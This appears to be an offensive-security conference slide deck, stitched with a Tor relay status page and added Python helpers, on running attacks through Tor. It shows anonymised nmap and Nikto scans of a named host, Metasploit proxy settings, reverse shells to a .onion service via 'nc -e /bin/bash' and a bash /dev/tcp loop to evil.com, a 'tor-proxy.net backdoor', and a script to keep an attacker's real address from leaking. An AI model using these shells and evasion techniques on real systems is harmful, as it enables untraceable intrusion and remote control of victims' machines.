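        lines.append("StrictExitNodes 1")
    return "\n".join(lines) + "\n", rejected


if __name__ == "__main__":
    pasted = [
        "46D0 5072 0DE9 D59E 6C22 D970 453B E287 C03F CE9B",  # from the slide
        "$46D050720DE9D59E6C22D970453BE287C03FCE9B",          # same relay, already normalized
        "0123 4567 89AB CDEF 0123 4567 89AB CDEF 0123 4567",  # constructed
        "Unnamed",                                            # a name, not a fingerprint
    ]
    text, bad = build_torrc(pasted)
    print(text)
    print("rejected:", bad)
```

Write the returned text to the config file you point Vidalia at, and keep the rejected list non-empty as a hard stop in whatever script regenerates the config when you rotate exits.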
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https://torstatus.blutmagie.de/ 



Tor Network Status -- Router Detail

General Information

Router Name: Unnamed
Fingerprint:
Contact: None Given
IP Address: 218.16.120.12
Hostname: Unavailable
Onion Router Port: 443
Directory Server Port: 9030
Country Code: CN
Platform / Version: Tor 0.1.2.19 on Windows Server 2003 Service Pack 2 [server] {enterprise} {terminal services, single user} {terminal services}
Last Descriptor Published (GMT): 2009-05-24 06:03:43
Current Uptime: 29 Day(s), 11 Hour(s), 48 Minute(s), 10 Second(s)
Bandwidth (Max/Burst/Observed - In Bps): 3145728/6291456/848912
Family: No Info Given
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Who's who 

• In Vidalia, you must point at the new config 
file 

• Stop TOR 

• Open settings 

- Advanced 

- And point to the new config file 
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What do I have? 

• Privoxy 

• HTTP proxy on port 8118 (by default) 

• Cleans/denies pages that may unintentionally reveal 
private IP when viewed in browser 

• Commonly configured to talk to tor's socks proxy 

• TOR 

• Full socks 5 proxy on port 9050 

• Vidalia 

• Gui interface to control tor 
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It'll fit 



• As it turns out, with a bit of creative patchwork, just about any TCP connection can go over tor

• There are a few programs in Linux that can really make TOR useful

- proxychains

- tsocks

- torsocks

• These programs are designed to hook the socket calls of a program (via LD_PRELOAD) and send them over the proxy

• When using these, always use IP, DNS can potentially leak

• Never run as root: with root, tools fall back to raw sockets (ping, SYN scans), which the hook doesn't cover, so that traffic leaves from your real address

• If one fails, try the other
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I want to proxy 



Setting up proxychains 

• In /etc/proxychains.conf 

- Comment out random_chain, chain_len, and the example proxies 

- Uncomment or add dynamic_chain 

- At the bottom add a socks 5 proxy for TOR 

• socks5 127.0.0.1 9050 

- Depending on path and target, the following values will need 
to be messed with 

• tcp_read_time_out 

• tcp_connect_time_out 

• The bigger these are, the more likely a probe completes through the circuit, but scans get slower and can produce more false positives
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I want to proxy 

• Setting up tsocks 

• In /etc/tsocks.conf make sure the following lines are correct

- server = 127.0.0.1 # TOR host, usually local

- server_type = 5 # Socks4/5, usually 5

- server_port = 9050 # tor port, default 9050
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I want to proxy 



Torsocks 

- Basically set up for you when built from 
source 

- TOR friendly replacement for tsocks 
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Let's give'r a go 

• Lets try nmap over tor 

• Timeouts become problematic 

• Different exit nodes have different policies, and may 
stop parts of the scan 

• The results are less than accurate, but provide a good 
place to start 

• Requires a lot of time, and a lot of tweaking, but better 
than flying to another country (sometimes) 

• Do not run UDP, name lookup, ping, or any scans requiring root: those use raw sockets or the system resolver, which the socket hook does not cover, so they leak your real address. Stick to -sT, -n and -Pn.
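Those rules are easy to forget at 2am, and the failure is silent: nmap runs fine, it just sends the forbidden probes from your own address. The following is an added Python example, not from the slides, that lints an nmap command line before you wrap it with proxychains or tsocks. It encodes the point above: LD_PRELOAD wrappers hook connect(), so only TCP connect scans go through Tor, while SYN/UDP/ICMP probes, OS detection and traceroute use raw sockets and bypass the hook.

```python
# Flags whose work happens on raw sockets or outside connect(): with
# proxychains/tsocks hooking connect() via LD_PRELOAD, these probes are
# sent from your real address, not through Tor.
RAW_SOCKET_FLAGS = {
    "-sS": "SYN scan uses raw sockets; use -sT",
    "-sU": "UDP scan uses raw sockets, and Tor does not carry UDP anyway",
    "-sA": "ACK scan uses raw sockets",
    "-sF": "FIN scan uses raw sockets",
    "-sX": "Xmas scan uses raw sockets",
    "-sN": "NULL scan uses raw sockets",
    "-sO": "IP protocol scan uses raw sockets",
    "-O": "OS detection uses raw sockets",
    "--traceroute": "traceroute uses raw sockets",
    "-A": "-A enables OS detection and traceroute; use -sV (and -sC) instead",
}


def tor_preflight(argv):
    """Return the problems with an nmap argv about to run under proxychains/tsocks.

    An empty list means it is safe to wrap. Each option is matched as its
    own argv token, so pass flags separately (-n -Pn -sT), not bundled.
    """
    args = list(argv)
    if args and args[0].endswith("nmap"):
        args = args[1:]
    present = set(args)
    problems = ["%s: %s" % (flag, why)
                for flag, why in RAW_SOCKET_FLAGS.items() if flag in present]
    if "-n" not in present:
        problems.append("missing -n: nmap would resolve names with your real resolver")
    if not present & {"-Pn", "-PN", "-P0"}:
        problems.append("missing -Pn: host discovery sends ICMP/ARP/raw probes outside the proxy")
    if "-sT" not in present:
        problems.append("missing -sT: nmap picks SYN scan when run as root; ask for connect scan explicitly")
    return problems


if __name__ == "__main__":
    for cmd in (["nmap", "-n", "-Pn", "-sT", "-p", "80,22,443", "192.1.167.74"],
                ["nmap", "-sS", "-p", "80", "192.1.167.74"]):
        verdict = tor_preflight(cmd)
        print(" ".join(cmd), "->", verdict or "ok: proxychains " + " ".join(cmd))
```

The slide's own command line (nmap -n -PN -p ...) passes except for the explicit -sT, which only matters if you break the "never as root" rule; the -A run in the next slide is flagged because as root it would fingerprint the OS from outside Tor.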
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Lets give'r a go 



user@user-laptop:~/tor_rc$ proxychains nmap -n -PN -p 80,22,443 192.1.167.74

Starting Nmap 4.76 ( http://nmap.org ) at 2009-05-25 09:41 MDT
ProxyChains-2.1 (http://proxychains.sf.net)
dynamic chain:....127.0.0.1:9050....access denied to..192.1.167.74:443
dynamic chain:....127.0.0.1:9050....access denied to..192.1.167.74:443

(the exit node's policy refuses 443, so that port never gets probed; this is the "different policies" problem from the previous slide)

user@user-laptop:~/tor_rc$ proxychains nmap -n -A -PN -p 80,22 192.1.167.74

Starting Nmap 4.76 ( http://nmap.org ) at 2009-05-25 09:42 MDT
ProxyChains-2.1 (http://proxychains.sf.net)
dynamic chain:....127.0.0.1:9050....192.1.167.74:22..OK
dynamic chain:....127.0.0.1:9050....192.1.167.74:80..OK
dynamic chain:....127.0.0.1:9050....192.1.167.74:22..OK
dynamic chain:....127.0.0.1:9050....192.1.167.74:80..OK

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd

Service Info: OS: Linux
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Lets get a bit deeper 

• Here will run Nikto over tor. 

• Nikto has a proxy option 

- This is a full HTTP proxy, not socks 

- This can be used with Privoxy 

- Privoxy will end up messing with results, making it 
less than useful 

• Instead running Nikto over tsocks works much 
better 
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Lets get a bit deeper 



user@user-laptop:~/$ proxychains nikto -host blog.attackresearch.com 192.1.167.74 
- Nikto V2.03/2.04 



ProxyChains-2.1 (http://proxychains.sf.net) 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ Target IP: 192.1.167.74 

+ Target Hostname: blog.attackresearch.com 

+ Target Port: 80 

+ Start Time: 2009-05-26 10:12:46 

+ Server: Apache 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

- /robots.txt - contains 40 'disallow' entries which should be manually viewed. (GET) 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.2.4-2ubuntu5.4 

dynamic chain:.. ..127.0.0.1:9050.... 192.1. 167.74:80..OK 

+ OSVDB-0: ETag header found on server, inode: 131801, size: 1820, mtime: 0x462ed49df8840 

+ 3577 items checked: 32 item(s) reported on remote host
+ End Time: 2009-05-26 15:07:00 (17654 seconds)



+ 1 host(s) tested 

Test Options: -host blog.attackresearch.com 192.1.167.74 
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What the heck, I'll eat the whole cow 

• Lets say there is a VPN at a remote site. It is a 
TCP based VPN like PPTP 

• With some creative combinations of port redirection, 
and tsock/proxychains we can VPN over TOR 

- This will not be very reliable 

- Timeout can kill the connection 

• Using tcpxd on one host we can setup 

- tsocks tcpxd 1723 ip.of.target 1723 

- Now have a second machine PPTP into the first 
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Metasploit and TOR 

A couple of possibilities 

- Use Torsocks 

- Easier to do it in metasploit 

• setg Proxies SOCKS4:localhost:<torport> 

- Both methods are restricted to Connect 
Shells 

- Both are restricted to TCP 

- Always try and use IP to avoid 
unintended leakage 
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Demo 




-;^, 
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Can they call me anonymously? 

• Sure, TOR uses .onion domains in order to 
talk to anonymous servers on the TOR 
network 

• Normally requires TOR on both sides 

• Can we shell to a .onion? 

- Sure, through tsocks, privoxy, or even wget 

• Can you tell what country a .onion is in? 

- Currently no, there have been problems found in 
TOR in the past, but they are fairly quick to patch 
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Shelling Bash Over TOR 

TOR is installed on target with torsocks 

- Simplest case, a netcat listener, and using 
built in bash commands 

-Setting up the server 

• In the torrc file, add the following lines

- HiddenServiceDir /my/service/dir/

- HiddenServicePort <portfortor> 127.0.0.1:<listenport>

• Now start netcat on <listenport>

nc -l -p <listenport>
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Shelling Bash Over TOR 

Now on the target
- With netcat

torsocks nc -e /bin/bash <hostname.onion> <torport>

<hostname.onion> is in the server's service dir in a file called hostname

- Without netcat (bash only: fd 5 becomes the socket, each line read from it is executed and its output sent back; use <hostname.onion> and <torport> here to reach the hidden service)

torsocks /bin/bash
exec 5<>/dev/tcp/evil.com/8080
cat <&5 | while read line; do $line 2>&5 >&5; done
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Do I have to install TOR on the target? 



Turns out no. 

• There are web proxy's that give access into the TOR 
network 

www.tor-proxy.net is one of many sites that lets a user bounce through them and then into TOR.

• Keep in mind, unfortunately they see all traffic; they won't know where the server is though

• http://tor-proxy.net/proxy/tor/browse.php?u=http%3A%2F%2Fslashdot.org%2F&b=14

- We have created Proof-of-Concept shells using this method 

- Basically a modified HTTP/HTTPS Shell 
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The tor-proxy.net Backdoor 



Benefits 

- No need for tor on the client 

- Can't tell who the server belongs to 

- Can do https 

Downfalls 

- tor-proxy.net can read all the traffic 

- Asynchronous, it can take a bit before 
command output 

- Not interactive 
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DEMO 
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To Do (working on it) 

Metasploit module that automatically 
generates the web apps / web server 

- Autogen's the applet & meterpreter 

- Integrate with PDF infector module 

- Integrate post-exploit automation scripts 

- Integrate with browser autopwn 

2 nd stage HTTP Backdoor 
More integration with TOR 
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PhishTunnel 



Demo everything over TOR 

- TOR backdoor communications 

- Metasploit over TOR 

- Metaphish concepts over TOR 
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Rezen 

Cg 

Snowchyld 

Ed Skoudis 

llso 

Dragorn 

Knicklighter 
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Thanks! 




HD Moore 
Dean De Beers 
Delchi 
egypt 
tebo 

carnal0wnage 
Anyone we forgot 
famousjs 



Check out the autopwn, egypt & Efrain Torres talks for awesome web p0wnage concepts and tools 
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